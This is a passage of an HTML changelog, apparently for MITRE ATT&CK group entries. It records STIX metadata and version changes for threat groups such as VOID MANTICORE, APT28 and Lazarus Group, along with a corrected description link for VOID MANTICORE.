style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-01-16 18:55:49.463000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[G1033] Star Blizzard</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-22 22:12:56.172000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr></tbody></table></details><hr><h4>[G1055] VOID MANTICORE</h4><p><b>Current version</b>: 1.0</p>
+    <table class="diff" id="difflib_chg_to3__top"
+           cellspacing="0" cellpadding="0" rules="groups" >
+        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
+        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
+        <thead><tr><th class="diff_next"><br /></th><th colspan="2" class="diff_header">Old Description</th><th class="diff_next"><br /></th><th colspan="2" class="diff_header">New Description</th></tr></thead>
+        <tbody>
+            <tr><td class="diff_next" id="difflib_chg_to3__0"><a href="#difflib_chg_to3__top">t</a></td><td class="diff_header" id="from3_1">1</td><td nowrap="nowrap">[VOID&nbsp;MANTICORE](https://attack.mitre.org/groups/G1055)&nbsp;is&nbsp;a</td><td class="diff_next"><a href="#difflib_chg_to3__top">t</a></td><td class="diff_header" id="to3_1">1</td><td nowrap="nowrap">[VOID&nbsp;MANTICORE](https://attack.mitre.org/groups/G1055)&nbsp;is&nbsp;a</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;threat&nbsp;group&nbsp;assessed&nbsp;to&nbsp;operate&nbsp;on&nbsp;behalf&nbsp;of&nbsp;Iran’s&nbsp;Minist</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;threat&nbsp;group&nbsp;assessed&nbsp;to&nbsp;operate&nbsp;on&nbsp;behalf&nbsp;of&nbsp;Iran’s&nbsp;Minist</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ry&nbsp;of&nbsp;Intelligence&nbsp;and&nbsp;Security&nbsp;(MOIS).(Citation:&nbsp;Check&nbsp;Poin</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ry&nbsp;of&nbsp;Intelligence&nbsp;and&nbsp;Security&nbsp;(MOIS).(Citation:&nbsp;Check&nbsp;Poin</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">t&nbsp;VOID&nbsp;MANTICORE&nbsp;Handala&nbsp;Hack&nbsp;March&nbsp;2026)&nbsp;Active&nbsp;since&nbsp;at&nbsp;le</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">t&nbsp;VOID&nbsp;MANTICORE&nbsp;Handala&nbsp;Hack&nbsp;March&nbsp;2026)&nbsp;Active&nbsp;since&nbsp;at&nbsp;le</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ast&nbsp;mid-2022,&nbsp;VOID&nbsp;MANTICORE&nbsp;has&nbsp;targeted&nbsp;government&nbsp;entitie</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ast&nbsp;mid-2022,&nbsp;VOID&nbsp;MANTICORE&nbsp;has&nbsp;targeted&nbsp;government&nbsp;entitie</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">s,&nbsp;critical&nbsp;infrastructure,&nbsp;and&nbsp;private&nbsp;sector&nbsp;organizations</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">s,&nbsp;critical&nbsp;infrastructure,&nbsp;and&nbsp;private&nbsp;sector&nbsp;organizations</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;across&nbsp;Albania,&nbsp;Israel,&nbsp;and&nbsp;the&nbsp;United&nbsp;States.(Citation:&nbsp;Ch</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;across&nbsp;Albania,&nbsp;Israel,&nbsp;and&nbsp;the&nbsp;United&nbsp;States.(Citation:&nbsp;Ch</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">eck&nbsp;Point&nbsp;VOID&nbsp;MANTICORE&nbsp;Handala&nbsp;Hack&nbsp;March&nbsp;2026)(Citation:&nbsp;</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">eck&nbsp;Point&nbsp;VOID&nbsp;MANTICORE&nbsp;Handala&nbsp;Hack&nbsp;March&nbsp;2026)(Citation:&nbsp;</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">Palo&nbsp;Alto&nbsp;VOID&nbsp;MANTICORE&nbsp;Iran&nbsp;Cyber&nbsp;Threats&nbsp;March&nbsp;2026)&nbsp;[VOI</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">Palo&nbsp;Alto&nbsp;VOID&nbsp;MANTICORE&nbsp;Iran&nbsp;Cyber&nbsp;Threats&nbsp;March&nbsp;2026)&nbsp;[VOI</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">D&nbsp;MANTICORE](https://attack.mitre.org/groups/G1055)&nbsp;conducts</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">D&nbsp;MANTICORE](https://attack.mitre.org/groups/G1055)&nbsp;conducts</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;destructive&nbsp;cyber&nbsp;operations,&nbsp;combining&nbsp;wiper&nbsp;attacks&nbsp;with&nbsp;</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;destructive&nbsp;cyber&nbsp;operations,&nbsp;combining&nbsp;wiper&nbsp;attacks&nbsp;with&nbsp;</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">hack-and-leak&nbsp;campaigns.&nbsp;The&nbsp;group&nbsp;has&nbsp;operated&nbsp;under&nbsp;multip</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">hack-and-leak&nbsp;campaigns.&nbsp;The&nbsp;group&nbsp;has&nbsp;operated&nbsp;under&nbsp;multip</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">le&nbsp;public-facing&nbsp;personas,&nbsp;including&nbsp;(<span class="diff_chg">LinkByld</span>:<span class="diff_chg">&nbsp;</span>C0038)&nbsp;in&nbsp;op</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">le&nbsp;public-facing&nbsp;personas,&nbsp;including&nbsp;<span class="diff_add">[HomeLand&nbsp;Justice]</span>(<span class="diff_chg">http</span></td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">erations&nbsp;against&nbsp;Albania,&nbsp;Karma&nbsp;and&nbsp;Karma&nbsp;Below&nbsp;in&nbsp;campaigns</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap"><span class="diff_chg">s</span>:<span class="diff_chg">//attack.mitre.org/campaigns/</span>C0038)&nbsp;in&nbsp;operations&nbsp;against&nbsp;</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;targeting&nbsp;Israeli&nbsp;organizations,&nbsp;and&nbsp;Handala&nbsp;Hack,&nbsp;its&nbsp;curr</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">Albania,&nbsp;Karma&nbsp;and&nbsp;Karma&nbsp;Below&nbsp;in&nbsp;campaigns&nbsp;targeting&nbsp;Israel</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ent&nbsp;primary&nbsp;persona,&nbsp;which&nbsp;has&nbsp;claimed&nbsp;activity&nbsp;against&nbsp;Isra</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">i&nbsp;organizations,&nbsp;and&nbsp;Handala&nbsp;Hack,&nbsp;its&nbsp;current&nbsp;primary&nbsp;perso</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">eli&nbsp;and&nbsp;U.S.&nbsp;entities,&nbsp;including&nbsp;a&nbsp;March&nbsp;2026&nbsp;attack&nbsp;against</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">na,&nbsp;which&nbsp;has&nbsp;claimed&nbsp;activity&nbsp;against&nbsp;Israeli&nbsp;and&nbsp;U.S.&nbsp;enti</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;Stryker&nbsp;Corporation.(Citation:&nbsp;Check&nbsp;Point&nbsp;VOID&nbsp;MANTICORE&nbsp;H</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ties,&nbsp;including&nbsp;a&nbsp;March&nbsp;2026&nbsp;attack&nbsp;against&nbsp;Stryker&nbsp;Corporat</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">andala&nbsp;Hack&nbsp;March&nbsp;2026)(Citation:&nbsp;DOJ&nbsp;FBI&nbsp;Handala&nbsp;Hack&nbsp;March</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ion.(Citation:&nbsp;Check&nbsp;Point&nbsp;VOID&nbsp;MANTICORE&nbsp;Handala&nbsp;Hack&nbsp;March</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;2026)&nbsp;&nbsp;[VOID&nbsp;MANTICORE](https://attack.mitre.org/groups/G10</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;2026)(Citation:&nbsp;DOJ&nbsp;FBI&nbsp;Handala&nbsp;Hack&nbsp;March&nbsp;2026)&nbsp;&nbsp;[VOID&nbsp;MAN</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">55)&nbsp;has&nbsp;been&nbsp;observed&nbsp;collaborating&nbsp;with&nbsp;Scarred&nbsp;Manticore,&nbsp;</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">TICORE](https://attack.mitre.org/groups/G1055)&nbsp;has&nbsp;been&nbsp;obse</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">which&nbsp;has&nbsp;been&nbsp;linked&nbsp;to&nbsp;initial&nbsp;access&nbsp;operations&nbsp;preceding</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">rved&nbsp;collaborating&nbsp;with&nbsp;Scarred&nbsp;Manticore,&nbsp;which&nbsp;has&nbsp;been&nbsp;li</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;VOID&nbsp;MANTICORE’s&nbsp;activity.(Citation:&nbsp;Domain&nbsp;Tools&nbsp;Handala&nbsp;H</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">nked&nbsp;to&nbsp;initial&nbsp;access&nbsp;operations&nbsp;preceding&nbsp;VOID&nbsp;MANTICORE’s</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">ack&nbsp;Karma&nbsp;Homeland&nbsp;Justice&nbsp;MOIS&nbsp;April&nbsp;2026)&nbsp;</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">&nbsp;activity.(Citation:&nbsp;Domain&nbsp;Tools&nbsp;Handala&nbsp;Hack&nbsp;Karma&nbsp;Homelan</td></tr>
+            <tr><td class="diff_next"></td><td class="diff_header"></td><td nowrap="nowrap">&nbsp;</td><td class="diff_next"></td><td class="diff_header">></td><td nowrap="nowrap">d&nbsp;Justice&nbsp;MOIS&nbsp;April&nbsp;2026)&nbsp;</td></tr>
+        </tbody>
+    </table><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 01:46:56.261000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.375000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>description</td><td style='border: 1px solid black;border-collapse: collapse;'>[VOID MANTICORE](https://attack.mitre.org/groups/G1055) is a threat group assessed to operate on behalf of Iran’s Ministry of Intelligence and Security (MOIS).(Citation: Check Point VOID MANTICORE Handala Hack March 2026) Active since at least mid-2022, VOID MANTICORE has targeted government entities, critical infrastructure, and private sector organizations across Albania, Israel, and the United States.(Citation: Check Point VOID MANTICORE Handala Hack March 2026)(Citation: Palo Alto VOID MANTICORE Iran Cyber Threats March 2026) [VOID MANTICORE](https://attack.mitre.org/groups/G1055) conducts destructive cyber operations, combining wiper attacks with hack-and-leak campaigns. The group has operated under multiple public-facing personas, including (LinkByld: C0038) in operations against Albania, Karma and Karma Below in campaigns targeting Israeli organizations, and Handala Hack, its current primary persona, which has claimed activity against Israeli and U.S. entities, including a March 2026 attack against Stryker Corporation.(Citation: Check Point VOID MANTICORE Handala Hack March 2026)(Citation: DOJ FBI Handala Hack March 2026)  [VOID MANTICORE](https://attack.mitre.org/groups/G1055) has been observed collaborating with Scarred Manticore, which has been linked to initial access operations preceding VOID MANTICORE’s activity.(Citation: Domain Tools Handala Hack Karma Homeland Justice MOIS April 2026) </td><td style='border: 1px solid black;border-collapse: collapse;'>[VOID MANTICORE](https://attack.mitre.org/groups/G1055) is a threat group assessed to operate on behalf of Iran’s Ministry of Intelligence and Security (MOIS).(Citation: Check Point VOID MANTICORE Handala Hack March 2026) Active since at least mid-2022, VOID MANTICORE has targeted government entities, critical infrastructure, and private sector organizations across Albania, Israel, and the United States.(Citation: Check Point VOID MANTICORE Handala Hack March 2026)(Citation: Palo Alto VOID MANTICORE Iran Cyber Threats March 2026) [VOID MANTICORE](https://attack.mitre.org/groups/G1055) conducts destructive cyber operations, combining wiper attacks with hack-and-leak campaigns. The group has operated under multiple public-facing personas, including [HomeLand Justice](https://attack.mitre.org/campaigns/C0038) in operations against Albania, Karma and Karma Below in campaigns targeting Israeli organizations, and Handala Hack, its current primary persona, which has claimed activity against Israeli and U.S. entities, including a March 2026 attack against Stryker Corporation.(Citation: Check Point VOID MANTICORE Handala Hack March 2026)(Citation: DOJ FBI Handala Hack March 2026)  [VOID MANTICORE](https://attack.mitre.org/groups/G1055) has been observed collaborating with Scarred Manticore, which has been linked to initial access operations preceding VOID MANTICORE’s activity.(Citation: Domain Tools Handala Hack Karma Homeland Justice MOIS April 2026) </td></tr></tbody></table></details><hr><h4>[G0102] Wizard Spider</h4><p><b>Current version</b>: 4.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-01-20 16:26:04.859000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr></tbody></table></details><hr><h4>[G0045] menuPass</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-11-17 23:19:12.450000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details></details><h3>mobile-attack</h3><details><summary>Minor Version Changes</summary><hr><h4>[G0040] Patchwork</h4><p><b>Current version</b>: 1.7</p><p><b>Version changed from</b>: 1.6 → 1.7</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 23:13:16.458000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_version</td><td style='border: 1px solid black;border-collapse: collapse;'>1.6</td><td style='border: 1px solid black;border-collapse: collapse;'>1.7</td></tr></tbody></table></details></details><details><summary>Patches</summary><hr><h4>[G0007] APT28</h4><p><b>Current version</b>: 5.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-21 13:20:49.866000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr></tbody></table></details><hr><h4>[G0069] MuddyWater</h4><p><b>Current version</b>: 7.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-23 03:26:57.416000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.731000+00:00</td></tr></tbody></table></details><hr><h4>[G1033] Star Blizzard</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-22 22:12:56.172000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr></tbody></table></details></details><h3>ics-attack</h3><details><summary>Patches</summary><hr><h4>[G0046] FIN7</h4><p><b>Current version</b>: 4.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 03:18:58.136000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr></tbody></table></details><hr><h4>[G1001] HEXANE</h4><p><b>Current version</b>: 2.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2024-08-14 15:24:19.141000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[G0032] Lazarus Group</h4><p><b>Current version</b>: 5.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 01:29:21.748000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr></tbody></table></details><hr><h4>[G0049] OilRig</h4><p><b>Current version</b>: 5.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-01-16 18:55:49.463000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.732000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[G0102] Wizard Spider</h4><p><b>Current version</b>: 4.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid 